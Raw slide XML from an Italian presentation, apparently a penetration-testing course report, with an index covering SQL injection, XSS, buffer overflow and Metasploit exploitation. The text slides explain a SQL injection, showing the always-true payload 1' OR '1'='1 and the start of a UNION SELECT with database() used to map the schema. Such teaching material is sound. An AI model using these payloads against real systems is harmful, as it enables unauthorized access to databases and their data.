            <p:cNvPr name="Freeform 9" id="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0" id="1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1" id="1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45764" t="0" r="-45764" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 12" id="1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3" id="1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4" id="1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5" id="1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6" id="1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7" id="1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8" id="1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1076500">
            <a:off x="8101982" y="2739431"/>
            <a:ext cx="2770324" cy="838023"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="838023" w="2770324">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2770323" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2770323" y="838023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="838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3" id="23"/>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4" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="700016" y="1644165"/>
            <a:ext cx="7193452" cy="7215013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Confermata l’esposizione del DB a SQL Injections, ci si può avvalere degli operatori booleani per studiare meglio la struttura del DB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In questo caso, grazie all’operatore OR, è possibile inviare una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>query sempre vera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> che fornirà informazioni riguardanti ogni record della tabella.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inserendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>1' OR ‘1’=’1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>i risultati che vengono restituiti  equivalgono sia all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>’ID 1 che a tutti gli altri ID presenti nel DB. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>La Query così generata diventa:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = “ 1' OR ‘1’=’1“ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L’utilizzo dell’operatore booleano, prova ancora una volta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2069">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>la vulnerabilità del DB. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2897"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-413365">
            <a:off x="8212503" y="6819928"/>
            <a:ext cx="2770324" cy="838023"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="838023" w="2770324">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2770324" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2770324" y="838023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="838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5868" y="-635766"/>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94065" y="44628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9954" y="763155"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15751273" y="-1086697"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5399096" y="763155"/>
            <a:ext cx="11650654" cy="8308021"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3068485" cy="2188121"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3068485" cy="2188121"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2188121" w="3068485">
                  <a:moveTo>
                    <a:pt x="16613" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3051873" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3061047" y="0"/>
                    <a:pt x="3068485" y="7438"/>
                    <a:pt x="3068485" y="16613"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3068485" y="2171508"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3068485" y="2180683"/>
                    <a:pt x="3061047" y="2188121"/>
                    <a:pt x="3051873" y="2188121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16613" y="2188121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7438" y="2188121"/>
                    <a:pt x="0" y="2180683"/>
                    <a:pt x="0" y="2171508"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="16613"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7438"/>
                    <a:pt x="7438" y="0"/>
                    <a:pt x="16613" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="3068485" cy="2235746"/>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3908993" y="5077050"/>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2051378" y="3236663"/>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0" r="0" b="-139600"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7725165" y="3810812"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7866645" y="6129338"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6566255" y="2193669"/>
            <a:ext cx="7803676" cy="4933782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>1 - Giorno 1: Web Application SQLi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>2 - Giorno 2: Web Application Exploit XSS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>3 - Giorno 3: System Exploit BOF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>4 - Giorno 4: Exploit Metasploitable con Metasploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>5 - Giorno 5: Exploit Windows con Metasploit </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7794350" y="2617769"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7725165" y="4915781"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7990470" y="7217938"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14369931" y="6520259"/>
            <a:ext cx="1869662" cy="2057400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2057400" w="1869662">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1869662" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869662"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4312674" y="875982"/>
            <a:ext cx="12689927" cy="886461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="-728">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>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11765952" y="1141271"/>
            <a:ext cx="5511612" cy="738072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6043"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4317">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10767274" y="969226"/>
            <a:ext cx="5511612" cy="440891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3523"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2517">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>MACRO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0525637" y="5288185"/>
            <a:ext cx="9648774" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="9648774">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9648774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96487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4319613" y="0"/>
            <a:ext cx="9648774" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="9648774">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9648774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96487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7350715">
            <a:off x="15330618" y="1073605"/>
            <a:ext cx="7665473" cy="7339690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7339690" w="7665473">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7665473" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665473" y="7339690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7339690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="7350715">
            <a:off x="-1251589" y="9167468"/>
            <a:ext cx="4960930" cy="4750091"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4750091" w="4960930">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4960930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4960930" y="4750091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4750091"/>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0218506" y="1720009"/>
            <a:ext cx="7764188" cy="6233798"/>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10101"/>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CCCCCC"/>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39590" t="-39818" r="-10011" b="-67427"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1772259"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3.5 - STUDIO DEL DATABASE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>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3" id="13"/>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14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="428653" y="1402938"/>
            <a:ext cx="9242180" cy="7324090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t>Dopo aver individuato la falla del sistema, ci serviamo dell’operatore di unione di SQL (UNION) che ci consente di combinare i risultati di una query di selezione SELECT, per studiare la struttura del database. L’operatore UNION richiede la selezione dello stesso numero di campi della query inserita nel codice della pagina. In questo caso i campi sono due e sono stati scelti 1 e database(), quindi la query da inserire è:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t> La query generata sarà:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="410213" indent="-205106" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t>Il valore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2 Bold"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t> è una costante e verrà restituito come risultato della prima colonna della query di unione. La scelta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2 Semi-Bold"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
